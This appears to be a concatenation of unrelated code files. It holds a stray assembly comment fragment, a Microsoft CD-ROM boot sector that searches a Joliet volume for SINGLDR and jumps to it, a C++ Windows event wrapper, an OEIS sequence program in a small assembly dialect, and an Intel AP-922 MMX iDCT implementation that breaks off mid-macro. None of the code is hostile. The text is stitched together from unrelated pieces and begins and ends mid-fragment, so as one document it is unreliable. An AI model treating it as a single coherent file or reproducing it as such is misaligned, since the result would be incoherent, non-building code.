; hl = -1
; carry set
;
; uses : af, bc, de, hl
|
;;
;; Copyright (c) Microsoft Corporation. All rights reserved.
;;
;;;;;;;;;;;;;;;;;;;;
; Concerns
; 1 - there is no error checking on the int13 calls
; 2 - we assume that the block size is 2048 bytes
; 3 - this cannot handle large root directories (>64KB)
;;;;;;;;;;;;;;;;;;;;
; Constants
BootSecOrigin EQU 07c00h ; the BIOS puts the boot sector at 07c0h:0000 == 0000:7c00h
StackOffset EQU -12 ; we will put the stack a small bit below it (we hardly use the stack, so it is safe...)
;;;;;;;;;;;;;;;;;;;;
; Macros
JMPF16 MACRO SEG:REQ,OFF:REQ
db 0eah
dw OFF
dw SEG
ENDM
;;;;;;;;;;;;;;;;;;;;
; Directives
.model tiny
.686p
;;;;;;;;;;;;;;;;;;;;
; Begin Code segment
_TEXT SEGMENT use16 ; 16-bit code segment
.code
ORG 0h ; ETFS puts us at 07c0h:0000
start:
JMPF16 07c0h,OFFSET Step1
Step1: ; set stack and data segments
mov cx, cs
mov ss, cx
mov sp, BootSecOrigin + StackOffset
mov es, cx
mov ds, cx
mov bp, sp
Step2: ; Save the boot drive (dl holds it on boot)
mov [CDDrive], dl
Step3: ; Clear the Screen
mov ax, 02h
int 010h
;; Configure GS to point to the text-mode video console.
mov ax, 0b800h
mov gs, ax
;; Write 'A' to position 0.
mov ax, 04f41h
mov gs:[0], ax
;; Write 'B' to position 1.
mov ax, 04f42h
mov gs:[2], ax
Step4: ; Load the PVD to get the Logical Block Size
mov eax, 10h ; the PVD is in the 16th block
mov bx, 2000h
mov es, bx ; transfer address = 2000:0000
mov cx, 1
call ReadDisk
mov ax, es:128 ; block size is at offset 128
mov [BlockSize], ax
;; Write 'C' to position 2.
mov ax, 04f43h
mov gs:[4], ax
Step5: ; Find the Joliet SVD, and then find the Root Directory Information
mov eax, 10h ; start with the PVD, even though it will fail
GetNextVD:
push eax
mov cx, 1
call ReadDisk
mov si, OFFSET SVDesc ; [ds:si] points to the desired first 6 bytes of this VD
xor di, di ; [es:di] points to the start of what we just read
mov cx, 6
repe cmpsb
je FoundSVD
mov al, es:0000h
cmp al, 0FFh ; is this the last Volume Descriptor?
je SVDError
pop eax
inc eax
jmp GetNextVD ; try another VD
FoundSVD: ; need to make sure this is a Joliet SVD - we need 025h, 02Fh, 045h in [88,89,90]
mov si, OFFSET JolietSig ; [ds:si] points to the Joliet Signature
mov di, 88 ; [es:di] points to the escape sequence field of the current SVD
mov cx, 3
repe cmpsb
je FoundJoliet
pop eax
inc eax
jmp GetNextVD
FoundJoliet:
;; Write 'D' to position 3.
mov ax, 04f44h
mov gs:[6], ax
mov eax, es:158 ; now get the rootstart and rootsize fields
mov [RootStart], eax
mov eax, es:166
mov [RootSize], eax
Step6: ; Load the Root Directory (SVD), and search it for SINGLDR
movzx ebx, [BlockSize]
div ebx ; eax has # blocks in root directory. Round up if necessary:
cmp edx, 0
je ReadyToLoad
add eax, 1
ReadyToLoad: ; we're going to assume that the root directory will not be bigger than 64K
mov ecx, eax
mov eax, [RootStart]
call ReadDisk
xor ebx, ebx ; bx will hold the start of the current entry
CheckEntry:
mov di, bx
add di, 25 ; let's check the file flags - should be 00
mov al, es:[di]
cmp al, 0
jne PrepNextEntry
; file flags are good. now check the file identifier:
mov si, OFFSET Stage2FileSize
xor cx, cx
mov cl, ds:[si] ; first byte is file name length
add cx, 2 ; add two because we check the length byte of the directory entry and the padding byte, too
add di, 7 ; now es:di points to the file length/name field, and ds:si has our desired content
repe cmpsb
je FoundEntry
PrepNextEntry:
xor cx, cx ; increment bx by adding the byte value in es:[bx]
mov cl, es:[bx] ; if es:[bx]==0 and ebx!= [RootSize], then we are in a padding zone
cmp cx, 0 ; designed to prevent a directory entry from spilling over a block.
jne LoadNext ; Should this be the case, we will increment bx until es:[bx] is not null
inc bx
jmp PrepNextEntry
LoadNext:
add bx, cx
cmp ebx, [RootSize]
jl CheckEntry
jmp FileNotFoundError
FoundEntry:
;; Write 'E' to position 5.
mov ax, 04f45h
mov gs:[8], ax
mov eax, es:[bx+2]
mov [FileStart], eax
mov eax, es:[bx+10]
mov [FileSize], eax
Step7: ; Load the file to 57c0:0000
mov cx, 057c0h
mov es, cx
movzx ebx, [BlockSize]
div ebx ; eax has # blocks in root directory
cmp edx, 0 ; on carry, there will be one more block
je ReadyToLoadFile
add eax, 1
ReadyToLoadFile:
mov ecx, eax
mov eax, [FileStart]
call ReadDisk
;; Write 'F' to position 6.
mov ax, 04f46h
mov gs:[10], ax
Step8: ; Now we need to set up the stack for SINGLDR and do a jump
xor cx, cx ; Always point the stack to 0000:7c00h - 12
mov ss, cx
mov sp, BootSecOrigin + StackOffset
movzx edx, [CDDrive]
push edx ; SINGLDR will need to know the boot drive #
pushd 04344h ; CD boot signature
pushw offset infloop ; return address = "infloop", which is the infinite loop
push cs
;; Write 'G' to position 7.
mov ax, 04f47h
mov gs:[12], ax
db 0EAh ; emit a long jump to 5000:7c00
dd 50007c00h
;;;;;;;;;;;;;;;;;;;;
; ReadDisk
;
; Inputs: eax = Block Number
; cx = number of blocks to read (warning: cx > 32 will cause overflow)
; es = destination segment
; Assumptions: 1 - assumes request will not cause overflow of es:00 (limit on # sectors)
; 2 - assumes int13 extensions available
ReadDisk PROC NEAR
pushad
mov dl, [CDDrive] ; set the drive
pushd 00
push eax ; push 64-bit block number (top half always null)
push es
pushw 00h ; push transfer address
push cx ; # sectors
pushw 0010h ; this request packet is 16 bytes
mov ah,42h ; extended read
mov si,sp ; ds:si = address of params
int 13h ; perform the read
add sp, 10h ; clean the stack and return
popad
ret
ReadDisk ENDP
;;;;;;;;;;;;;;;;;;;;
; Error Routines (these are jump points that never return)
SVDError:
mov si, offset SvdFailMsg
call PrintString
@@:
jmp @b
FileNotFoundError:
mov si, offset FileNotFoundMsg
call PrintString
@@:
jmp @b
PrintString:
psnext:
lodsb
or al, al
jz done
;;; Write directly to memory.
mov ah, 047h
mov bx, [Cursor]
mov gs:[bx], ax
add bx, 2
mov [Cursor], bx
mov bx, 07h ; normal attribute
mov ah, 0eh ; default print 1 char
int 10h
jmp psnext
done:
ret
infloop:
jmp infloop
;;;;;;;;;;;;;;;;;;;;
; Global Vars
RootStart DD 0
RootSize DD 0
CDDrive DB 0
BlockSize DW 0
FileStart DD 0
FileSize DD 0
Cursor DW 640
;;;;;;;;;;;;;;;;;;;;
; String Constants
SVDesc DB 02h, "CD001"
JolietSig DB 25h, 2fh, 45h ; this is the value of the escape sequence for a Joliet CD
; we'll use it as the signature...
Stage2FileSize DB OFFSET Stage2FilePad - OFFSET Stage2File
Stage2File DB 0,"S",0,"i",0,"n",0,"g",0,"l",0,"d",0,"r" ; in unicode, this is how our filename will appear
Stage2FilePad DB 0
SvdFailMsg DB 10,13,"SVD Failed",0
FileNotFoundMsg DB 10,13,"File not found",0
;;;;;;;;;;;;;;;;;;;;
; Boot Sector Signature
ORG 510
DW 0AA55h
end start
|
#include "WindowsMessageQueue.h"
Event::Event()
{
hEvent = CreateEvent(0, 0, 0, 0);
}
Event::~Event()
{
CloseHandle(hEvent);
}
void Event::SetEvent()
{
::SetEvent(hEvent);
}
void Event::WaitForEvent()
{
WaitForSingleObject(hEvent, INFINITE);
}
Event::WaitResult Event::WaitForEventOrMessage()
{
auto res = MsgWaitForMultipleObjects(1, &hEvent, FALSE, INFINITE, QS_ALLEVENTS);
if (res == WAIT_OBJECT_0)
return WaitEvent;
if (res == WAIT_OBJECT_0 + 1)
return WaitMessage;
return WaitFail;
} |
; A225144: a(n) = Sum_{i=n..2*n} i^2*(-1)^i.
; 0,3,11,18,42,45,93,84,164,135,255,198,366,273,497,360,648,459,819,570,1010,693,1221,828,1452,975,1703,1134,1974,1305,2265,1488,2576,1683,2907,1890,3258,2109,3629,2340,4020,2583,4431,2838,4862,3105,5313,3384,5784,3675,6275,3978,6786,4293,7317,4620,7868,4959,8439,5310,9030,5673,9641,6048,10272,6435,10923,6834,11594,7245,12285,7668,12996,8103,13727,8550,14478,9009,15249,9480,16040,9963,16851,10458,17682,10965,18533,11484,19404,12015,20295,12558,21206,13113,22137,13680,23088,14259,24059,14850
mov $2,$0
mov $5,$0
lpb $0
add $3,$2
add $1,$3
mov $4,$0
mul $4,$0
lpb $4
sub $4,$3
mod $3,2
lpe
add $1,$4
lpb $0
add $1,$0
sub $0,1
lpe
lpe
mov $6,$5
mul $6,$5
add $1,$6
mov $0,$1
|
;
; idct8x8_xmm.asm
;
; Originally provided by Intel at AP-922
; http://developer.intel.com/vtune/cbts/strmsimd/922down.htm
; (See more app notes at http://developer.intel.com/vtune/cbts/strmsimd/appnotes.htm)
; but in a limited edition.
; New macro implements a column part for precise iDCT
; The routine precision now satisfies IEEE standard 1180-1990.
;
; Copyright (c) 2000-2001 Peter Gubanov <peter@elecard.net.ru>
; Rounding trick Copyright (c) 2000 Michel Lespinasse <walken@zoy.org>
;
; http://www.elecard.com/peter/idct.html
; http://www.linuxvideo.org/mpeg2dec/
;
;=============================================================================
;
; These examples contain code fragments for first stage iDCT 8x8
; (for rows) and first stage DCT 8x8 (for columns)
;
;=============================================================================
mword typedef qword
mptr equ mword ptr
BITS_INV_ACC = 5 ; 4 or 5 for IEEE
SHIFT_INV_ROW = 16 - BITS_INV_ACC
SHIFT_INV_COL = 1 + BITS_INV_ACC
RND_INV_ROW = 1024 * (6 - BITS_INV_ACC) ; 1 << (SHIFT_INV_ROW-1)
RND_INV_COL = 16 * (BITS_INV_ACC - 3) ; 1 << (SHIFT_INV_COL-1)
RND_INV_CORR = RND_INV_COL - 1 ; correction -1.0 and round
BITS_FRW_ACC = 3 ; 2 or 3 for accuracy
SHIFT_FRW_COL = BITS_FRW_ACC
SHIFT_FRW_ROW = BITS_FRW_ACC + 17
RND_FRW_ROW = 262144 * (BITS_FRW_ACC - 1) ; 1 << (SHIFT_FRW_ROW-1)
_MMX = 1
.nolist
.586
if @version GE 612
.mmx
;mmword TEXTEQU <QWORD>
else
include IAMMX.INC
endif
if @version GE 614
.xmm
;mm2word TEXTEQU <QWORD> ; needed for Streaming SIMD Extensions macros
else
include iaxmm.inc ; Streaming SIMD Extensions Emulator Macros
endif
.list
.model flat
_DATA SEGMENT PARA PUBLIC USE32 'DATA'
one_corr sword 1, 1, 1, 1
round_inv_row dword RND_INV_ROW, RND_INV_ROW
round_inv_col sword RND_INV_COL, RND_INV_COL, RND_INV_COL, RND_INV_COL
round_inv_corr sword RND_INV_CORR, RND_INV_CORR, RND_INV_CORR, RND_INV_CORR
round_frw_row dword RND_FRW_ROW, RND_FRW_ROW
tg_1_16 sword 13036, 13036, 13036, 13036 ; tg * (2<<16) + 0.5
tg_2_16 sword 27146, 27146, 27146, 27146 ; tg * (2<<16) + 0.5
tg_3_16 sword -21746, -21746, -21746, -21746 ; tg * (2<<16) + 0.5
cos_4_16 sword -19195, -19195, -19195, -19195 ; cos * (2<<16) + 0.5
ocos_4_16 sword 23170, 23170, 23170, 23170 ; cos * (2<<15) + 0.5
otg_3_16 sword 21895, 21895, 21895, 21895 ; tg * (2<<16) + 0.5
; assume SHIFT_INV_ROW == 12
;rounder_0 dword 65536, 65536
;rounder_4 dword 0, 0
;rounder_1 dword 7195, 7195
;rounder_7 dword 1024, 1024
;rounder_2 dword 4520, 4520
;rounder_6 dword 1024, 1024
;rounder_3 dword 2407, 2407
;rounder_5 dword 240, 240
; assume SHIFT_INV_ROW == 11
rounder_0 dword 65536, 65536
rounder_4 dword 0, 0
rounder_1 dword 3597, 3597
rounder_7 dword 512, 512
rounder_2 dword 2260, 2260
rounder_6 dword 512, 512
rounder_3 dword 1203, 1203
rounder_5 dword 120, 120
;=============================================================================
;
; The first stage iDCT 8x8 - inverse DCTs of rows
;
;-----------------------------------------------------------------------------
; The 8-point inverse DCT direct algorithm
;-----------------------------------------------------------------------------
;
; static const short w[32] = {
; FIX(cos_4_16), FIX(cos_2_16), FIX(cos_4_16), FIX(cos_6_16),
; FIX(cos_4_16), FIX(cos_6_16), -FIX(cos_4_16), -FIX(cos_2_16),
; FIX(cos_4_16), -FIX(cos_6_16), -FIX(cos_4_16), FIX(cos_2_16),
; FIX(cos_4_16), -FIX(cos_2_16), FIX(cos_4_16), -FIX(cos_6_16),
; FIX(cos_1_16), FIX(cos_3_16), FIX(cos_5_16), FIX(cos_7_16),
; FIX(cos_3_16), -FIX(cos_7_16), -FIX(cos_1_16), -FIX(cos_5_16),
; FIX(cos_5_16), -FIX(cos_1_16), FIX(cos_7_16), FIX(cos_3_16),
; FIX(cos_7_16), -FIX(cos_5_16), FIX(cos_3_16), -FIX(cos_1_16) };
;
; #define DCT_8_INV_ROW(x, y)
; {
; int a0, a1, a2, a3, b0, b1, b2, b3;
;
; a0 =x[0]*w[0]+x[2]*w[1]+x[4]*w[2]+x[6]*w[3];
; a1 =x[0]*w[4]+x[2]*w[5]+x[4]*w[6]+x[6]*w[7];
; a2 = x[0] * w[ 8] + x[2] * w[ 9] + x[4] * w[10] + x[6] * w[11];
; a3 = x[0] * w[12] + x[2] * w[13] + x[4] * w[14] + x[6] * w[15];
; b0 = x[1] * w[16] + x[3] * w[17] + x[5] * w[18] + x[7] * w[19];
; b1 = x[1] * w[20] + x[3] * w[21] + x[5] * w[22] + x[7] * w[23];
; b2 = x[1] * w[24] + x[3] * w[25] + x[5] * w[26] + x[7] * w[27];
; b3 = x[1] * w[28] + x[3] * w[29] + x[5] * w[30] + x[7] * w[31];
;
; y[0] = SHIFT_ROUND ( a0 + b0 );
; y[1] = SHIFT_ROUND ( a1 + b1 );
; y[2] = SHIFT_ROUND ( a2 + b2 );
; y[3] = SHIFT_ROUND ( a3 + b3 );
; y[4] = SHIFT_ROUND ( a3 - b3 );
; y[5] = SHIFT_ROUND ( a2 - b2 );
; y[6] = SHIFT_ROUND ( a1 - b1 );
; y[7] = SHIFT_ROUND ( a0 - b0 );
; }
;
;-----------------------------------------------------------------------------
;
; In this implementation the outputs of the iDCT-1D are multiplied
; for rows 0,4 - by cos_4_16,
; for rows 1,7 - by cos_1_16,
; for rows 2,6 - by cos_2_16,
; for rows 3,5 - by cos_3_16
; and are shifted to the left for better accuracy
;
; For the constants used,
; FIX(float_const) = (short) (float_const * (1<<15) + 0.5)
;
;=============================================================================
;=============================================================================
; MMX code
;=============================================================================
; Table for rows 0,4 - constants are multiplied by cos_4_16
tab_i_04 sword 16384, 16384, 16384, -16384 ; movq-> w06 w04 w02 w00
sword 21407, 8867, 8867, -21407 ; w07 w05 w03 w01
sword 16384, -16384, 16384, 16384 ; w14 w12 w10 w08
sword -8867, 21407, -21407, -8867 ; w15 w13 w11 w09
sword 22725, 12873, 19266, -22725 ; w22 w20 w18 w16
sword 19266, 4520, -4520, -12873 ; w23 w21 w19 w17
sword 12873, 4520, 4520, 19266 ; w30 w28 w26 w24
sword -22725, 19266, -12873, -22725 ; w31 w29 w27 w25
; Table for rows 1,7 - constants are multiplied by cos_1_16
tab_i_17 sword 22725, 22725, 22725, -22725 ; movq-> w06 w04 w02 w00
sword 29692, 12299, 12299, -29692 ; w07 w05 w03 w01
sword 22725, -22725, 22725, 22725 ; w14 w12 w10 w08
sword -12299, 29692, -29692, -12299 ; w15 w13 w11 w09
sword 31521, 17855, 26722, -31521 ; w22 w20 w18 w16
sword 26722, 6270, -6270, -17855 ; w23 w21 w19 w17
sword 17855, 6270, 6270, 26722 ; w30 w28 w26 w24
sword -31521, 26722, -17855, -31521 ; w31 w29 w27 w25
; Table for rows 2,6 - constants are multiplied by cos_2_16
tab_i_26 sword 21407, 21407, 21407, -21407 ; movq-> w06 w04 w02 w00
sword 27969, 11585, 11585, -27969 ; w07 w05 w03 w01
sword 21407, -21407, 21407, 21407 ; w14 w12 w10 w08
sword -11585, 27969, -27969, -11585 ; w15 w13 w11 w09
sword 29692, 16819, 25172, -29692 ; w22 w20 w18 w16
sword 25172, 5906, -5906, -16819 ; w23 w21 w19 w17
sword 16819, 5906, 5906, 25172 ; w30 w28 w26 w24
sword -29692, 25172, -16819, -29692 ; w31 w29 w27 w25
; Table for rows 3,5 - constants are multiplied by cos_3_16
tab_i_35 sword 19266, 19266, 19266, -19266 ; movq-> w06 w04 w02 w00
sword 25172, 10426, 10426, -25172 ; w07 w05 w03 w01
sword 19266, -19266, 19266, 19266 ; w14 w12 w10 w08
sword -10426, 25172, -25172, -10426 ; w15 w13 w11 w09
sword 26722, 15137, 22654, -26722 ; w22 w20 w18 w16
sword 22654, 5315, -5315, -15137 ; w23 w21 w19 w17
sword 15137, 5315, 5315, 22654 ; w30 w28 w26 w24
sword -26722, 22654, -15137, -26722 ; w31 w29 w27 w25
;-----------------------------------------------------------------------------
DCT_8_INV_ROW_1 MACRO INP:REQ, OUT:REQ, TABLE:REQ, ROUNDER:REQ
movq mm0, mptr [INP] ; 0 ; x3 x2 x1 x0
movq mm1, mptr [INP+8] ; 1 ; x7 x6 x5 x4
movq mm2, mm0 ; 2 ; x3 x2 x1 x0
movq mm3, mptr [TABLE] ; 3 ; w06 w04 w02 w00
punpcklwd mm0, mm1 ; x5 x1 x4 x0
movq mm5, mm0 ; 5 ; x5 x1 x4 x0
punpckldq mm0, mm0 ; x4 x0 x4 x0
movq mm4, mptr [TABLE+8] ; 4 ; w07 w05 w03 w01
punpckhwd mm2, mm1 ; 1 ; x7 x3 x6 x2
pmaddwd mm3, mm0 ; x4*w06+x0*w04 x4*w02+x0*w00
movq mm6, mm2 ; 6 ; x7 x3 x6 x2
movq mm1, mptr [TABLE+32] ; 1 ; w22 w20 w18 w16
punpckldq mm2, mm2 ; x6 x2 x6 x2
pmaddwd mm4, mm2 ; x6*w07+x2*w05 x6*w03+x2*w01
punpckhdq mm5, mm5 ; x5 x1 x5 x1
pmaddwd mm0, mptr [TABLE+16] ; x4*w14+x0*w12 x4*w10+x0*w08
punpckhdq mm6, mm6 ; x7 x3 x7 x3
movq mm7, mptr [TABLE+40] ; 7 ; w23 w21 w19 w17
pmaddwd mm1, mm5 ; x5*w22+x1*w20 x5*w18+x1*w16
paddd mm3, mptr [ROUNDER] ; +rounder
pmaddwd mm7, mm6 ; x7*w23+x3*w21 x7*w19+x3*w17
pmaddwd mm2, mptr [TABLE+24] ; x6*w15+x2*w13 x6*w11+x2*w09
paddd mm3, mm4 ; 4 ; a1=sum(even1) a0=sum(even0)
pmaddwd mm5, mptr [TABLE+48] ; x5*w30+x1*w28 x5*w26+x1*w24
movq mm4, mm3 ; 4 ; a1 a0
pmaddwd mm6, mptr [TABLE+56] ; x7*w31+x3*w29 x7*w27+x3*w25
paddd mm1, mm7 ; 7 ; b1=sum(odd1) b0=sum(odd0)
paddd mm0, mptr [ROUNDER] ; +rounder
psubd mm3, mm1 ; a1-b1 a0-b0
psrad mm3, SHIFT_INV_ROW ; y6=a1-b1 y7=a0-b0
paddd mm1, mm4 ; 4 ; a1+b1 a0+b0
paddd mm0, mm2 ; 2 ; a3=sum(even3) a2=sum(even2)
psrad mm1, SHIFT_INV_ROW ; y1=a1+b1 y0=a0+b0
paddd mm5, mm6 ; 6 ; b3=sum(odd3) b2=sum(odd2)
movq mm4, mm0 ; 4 ; a3 a2
paddd mm0, mm5 ; a3+b3 a2+b2
psubd mm4, mm5 ; 5 ; a3-b3 a2-b2
psrad mm0, SHIFT_INV_ROW ; y3=a3+b3 y2=a2+b2
psrad mm4, SHIFT_INV_ROW ; y4=a3-b3 y5=a2-b2
packssdw mm1, mm0 ; 0 ; y3 y2 y1 y0
packssdw mm4, mm3 ; 3 ; y6 y7 y4 y5
movq mm7, mm4 ; 7 ; y6 y7 y4 y5
psrld mm4, 16 ; 0 y6 0 y4
pslld mm7, 16 ; y7 0 y5 0
movq mptr [OUT], mm1 ; 1 ; save y3 y2 y1 y0
por mm7, mm4 ; 4 ; y7 y6 y5 y4
movq mptr [OUT+8], mm7 ; 7 ; save y7 y6 y5 y4
ENDM
;=============================================================================
; code for Pentium III
;=============================================================================
; Table for rows 0,4 - constants are multiplied by cos_4_16
tab_i_04_s sword 16384, 21407, 16384, 8867 ; movq-> w05 w04 w01 w00
sword 16384, 8867, -16384, -21407 ; w07 w06 w03 w02
sword 16384, -8867, 16384, -21407 ; w13 w12 w09 w08
sword -16384, 21407, 16384, -8867 ; w15 w14 w11 w10
sword 22725, 19266, 19266, -4520 ; w21 w20 w17 w16
sword 12873, 4520, -22725, -12873 ; w23 w22 w19 w18
sword 12873, -22725, 4520, -12873 ; w29 w28 w25 w24
sword 4520, 19266, 19266, -22725 ; w31 w30 w27 w26
; Table for rows 1,7 - constants are multiplied by cos_1_16
tab_i_17_s sword 22725, 29692, 22725, 12299 ; movq-> w05 w04 w01 w00
sword 22725, 12299, -22725, -29692 ; w07 w06 w03 w02
sword 22725, -12299, 22725, -29692 ; w13 w12 w09 w08
sword -22725, 29692, 22725, -12299 ; w15 w14 w11 w10
sword 31521, 26722, 26722, -6270 ; w21 w20 w17 w16
sword 17855, 6270, -31521, -17855 ; w23 w22 w19 w18
sword 17855, -31521, 6270, -17855 ; w29 w28 w25 w24
sword 6270, 26722, 26722, -31521 ; w31 w30 w27 w26
; Table for rows 2,6 - constants are multiplied by cos_2_16
tab_i_26_s sword 21407, 27969, 21407, 11585 ; movq-> w05 w04 w01 w00
sword 21407, 11585, -21407, -27969 ; w07 w06 w03 w02
sword 21407, -11585, 21407, -27969 ; w13 w12 w09 w08
sword -21407, 27969, 21407, -11585 ; w15 w14 w11 w10
sword 29692, 25172, 25172, -5906 ; w21 w20 w17 w16
sword 16819, 5906, -29692, -16819 ; w23 w22 w19 w18
sword 16819, -29692, 5906, -16819 ; w29 w28 w25 w24
sword 5906, 25172, 25172, -29692 ; w31 w30 w27 w26
; Table for rows 3,5 - constants are multiplied by cos_3_16
tab_i_35_s sword 19266, 25172, 19266, 10426 ; movq-> w05 w04 w01 w00
sword 19266, 10426, -19266, -25172 ; w07 w06 w03 w02
sword 19266, -10426, 19266, -25172 ; w13 w12 w09 w08
sword -19266, 25172, 19266, -10426 ; w15 w14 w11 w10
sword 26722, 22654, 22654, -5315 ; w21 w20 w17 w16
sword 15137, 5315, -26722, -15137 ; w23 w22 w19 w18
sword 15137, -26722, 5315, -15137 ; w29 w28 w25 w24
sword 5315, 22654, 22654, -26722 ; w31 w30 w27 w26
;-----------------------------------------------------------------------------
DCT_8_INV_ROW_1_s MACRO INP:REQ, OUT:REQ, TABLE:REQ, ROUNDER:REQ
movq mm0, mptr [INP] ; 0 ; x3 x2 x1 x0
movq mm1, mptr [INP+8] ; 1 ; x7 x6 x5 x4
movq mm2, mm0 ; 2 ; x3 x2 x1 x0
movq mm3, mptr [TABLE] ; 3 ; w05 w04 w01 w00
pshufw mm0, mm0, 10001000b ; x2 x0 x2 x0
movq mm4, mptr [TABLE+8] ; 4 ; w07 w06 w03 w02
movq mm5, mm1 ; 5 ; x7 x6 x5 x4
pmaddwd mm3, mm0 ; x2*w05+x0*w04 x2*w01+x0*w00
movq mm6, mptr [TABLE+32] ; 6 ; w21 w20 w17 w16
pshufw mm1, mm1, 10001000b ; x6 x4 x6 x4
pmaddwd mm4, mm1 ; x6*w07+x4*w06 x6*w03+x4*w02
movq mm7, mptr [TABLE+40] ; 7 ; w23 w22 w19 w18
pshufw mm2, mm2, 11011101b ; x3 x1 x3 x1
pmaddwd mm6, mm2 ; x3*w21+x1*w20 x3*w17+x1*w16
pshufw mm5, mm5, 11011101b ; x7 x5 x7 x5
pmaddwd mm7, mm5 ; x7*w23+x5*w22 x7*w19+x5*w18
paddd mm3, mptr [ROUNDER] ; +rounder
pmaddwd mm0, mptr [TABLE+16] ; x2*w13+x0*w12 x2*w09+x0*w08
paddd mm3, mm4 ; 4 ; a1=sum(even1) a0=sum(even0)
pmaddwd mm1, mptr [TABLE+24] ; x6*w15+x4*w14 x6*w11+x4*w10
movq mm4, mm3 ; 4 ; a1 a0
pmaddwd mm2, mptr [TABLE+48] ; x3*w29+x1*w28 x3*w25+x1*w24
paddd mm6, mm7 ; 7 ; b1=sum(odd1) b0=sum(odd0)
pmaddwd mm5, mptr [TABLE+56] ; x7*w31+x5*w30 x7*w27+x5*w26
paddd mm3, mm6 ; a1+b1 a0+b0
paddd mm0, mptr [ROUNDER] ; +rounder
psrad mm3, SHIFT_INV_ROW ; y1=a1+b1 y0=a0+b0
paddd mm0, mm1 ; 1 ; a3=sum(even3) a2=sum(even2)
psubd mm4, mm6 ; 6 ; a1-b1 a0-b0
movq mm7, mm0 ; 7 ; a3 a2
paddd mm2, mm5 ; 5 ; b3=sum(odd3) b2=sum(odd2)
paddd mm0, mm2 ; a3+b3 a2+b2
psrad mm4, SHIFT_INV_ROW ; y6=a1-b1 y7=a0-b0
psubd mm7, mm2 ; 2 ; a3-b3 a2-b2
psrad mm0, SHIFT_INV_ROW ; y3=a3+b3 y2=a2+b2
psrad mm7, SHIFT_INV_ROW ; y4=a3-b3 y5=a2-b2
packssdw mm3, mm0 ; 0 ; y3 y2 y1 y0
packssdw mm7, mm4 ; 4 ; y6 y7 y4 y5
movq mptr [OUT], mm3 ; 3 ; save y3 y2 y1 y0
pshufw mm7, mm7, 10110001b ; y7 y6 y5 y4
movq mptr [OUT+8], mm7 ; 7 ; save y7 y6 y5 y4
ENDM
;=============================================================================
;
;=============================================================================
;=============================================================================
;
; The first stage DCT 8x8 - forward DCTs of columns
;
; The outputs are multiplied
; for rows 0,4 - on cos_4_16,
; for rows 1,7 - on cos_1_16,
; for rows 2,6 - on cos_2_16,
; for rows 3,5 - on cos_3_16
; and are shifted to the left for rise of accuracy
;
;-----------------------------------------------------------------------------
;
; The 8-point scaled forward DCT algorithm (26a8m)
;
;-----------------------------------------------------------------------------
;
; #define DCT_8_FRW_COL(x, y)
;{
; short t0, t1, t2, t3, t4, t5, t6, t7;
; short tp03, tm03, tp12, tm12, tp65, tm65;
; short tp465, tm465, tp765, tm765;
;
; t0 = LEFT_SHIFT ( x[0] + x[7] );
; t1 = LEFT_SHIFT ( x[1] + x[6] );
; t2 = LEFT_SHIFT ( x[2] + x[5] );
; t3 = LEFT_SHIFT ( x[3] + x[4] );
; t4 = LEFT_SHIFT ( x[3] - x[4] );
; t5 = LEFT_SHIFT ( x[2] - x[5] );
; t6 = LEFT_SHIFT ( x[1] - x[6] );
; t7 = LEFT_SHIFT ( x[0] - x[7] );
;
; tp03 = t0 + t3;
; tm03 = t0 - t3;
; tp12 = t1 + t2;
; tm12 = t1 - t2;
;
; y[0] = tp03 + tp12;
; y[4] = tp03 - tp12;
;
; y[2] = tm03 + tm12 * tg_2_16;
; y[6] = tm03 * tg_2_16 - tm12;
;
; tp65 =(t6 +t5 )*cos_4_16;
; tm65 =(t6 -t5 )*cos_4_16;
;
; tp765 = t7 + tp65;
; tm765 = t7 - tp65;
; tp465 = t4 + tm65;
; tm465 = t4 - tm65;
;
; y[1] = tp765 + tp465 * tg_1_16;
; y[7] = tp765 * tg_1_16 - tp465;
; y[5] = tm765 * tg_3_16 + tm465;
; y[3] = tm765 - tm465 * tg_3_16;
;}
;
;=============================================================================
DCT_8_FRW_COL_4 MACRO INP:REQ, OUT:REQ
LOCAL x0, x1, x2, x3, x4, x5, x6, x7
LOCAL y0, y1, y2, y3, y4, y5, y6, y7
x0 equ [INP + 0*16]
x1 equ [INP + 1*16]
x2 equ [INP + 2*16]
x3 equ [INP + 3*16]
x4 equ [INP + 4*16]
x5 equ [INP + 5*16]
x6 equ [INP + 6*16]
x7 equ [INP + 7*16]
y0 equ [OUT + 0*16]
y1 equ [OUT + 1*16]
y2 equ [OUT + 2*16]
y3 equ [OUT + 3*16]
y4 equ [OUT + 4*16]
y5 equ [OUT + 5*16]
y6 equ [OUT + 6*16]
y7 equ [OUT + 7*16]
movq mm0, x1 ; 0 ; x1
movq mm1, x6 ; 1 ; x6
movq mm2, mm0 ; 2 ; x1
movq mm3, x2 ; 3 ; x2
paddsw mm0, mm1 ; t1 = x[1] + x[6]
movq mm4, x5 ; 4 ; x5
psllw mm0, SHIFT_FRW_COL ; t1
movq mm5, x0 ; 5 ; x0
paddsw mm4, mm3 ; t2 = x[2] + x[5]
paddsw mm5, x7 ; t0 = x[0] + x[7]
psllw mm4, SHIFT_FRW_COL ; t2
movq mm6, mm0 ; 6 ; t1
psubsw mm2, mm1 ; 1 ; t6 = x[1] - x[6]
movq mm1, mptr tg_2_16 ; 1 ; tg_2_16
psubsw mm0, mm4 ; tm12 = t1 - t2
movq mm7, x3 ; 7 ; x3
pmulhw mm1, mm0 ; tm12*tg_2_16
paddsw mm7, x4 ; t3 = x[3] + x[4]
psllw mm5, SHIFT_FRW_COL ; t0
paddsw mm6, mm4 ; 4 ; tp12 = t1 + t2
psllw mm7, SHIFT_FRW_COL ; t3
movq mm4, mm5 ; 4 ; t0
psubsw mm5, mm7 ; tm03 = t0 - t3
paddsw mm1, mm5 ; y2 = tm03 + tm12*tg_2_16
paddsw mm4, mm7 ; 7 ; tp03 = t0 + t3
por mm1, mptr one_corr ; correction y2 +0.5
psllw mm2, SHIFT_FRW_COL+1 ; t6
pmulhw mm5, mptr tg_2_16 ; tm03*tg_2_16
movq mm7, mm4 ; 7 ; tp03
psubsw mm3, x5 ; t5 = x[2] - x[5]
psubsw mm4, mm6 ; y4 = tp03 - tp12
movq y2, mm1 ; 1 ; save y2
paddsw mm7, mm6 ; 6 ; y0 = tp03 + tp12
movq mm1, x3 ; 1 ; x3
psllw mm3, SHIFT_FRW_COL+1 ; t5
psubsw mm1, x4 ; t4 = x[3] - x[4]
movq mm6, mm2 ; 6 ; t6
movq y4, mm4 ; 4 ; save y4
paddsw mm2, mm3 ; t6 + t5
pmulhw mm2, mptr ocos_4_16 ; tp65 = (t6 + t5)*cos_4_16
psubsw mm6, mm3 ; 3 ; t6 - t5
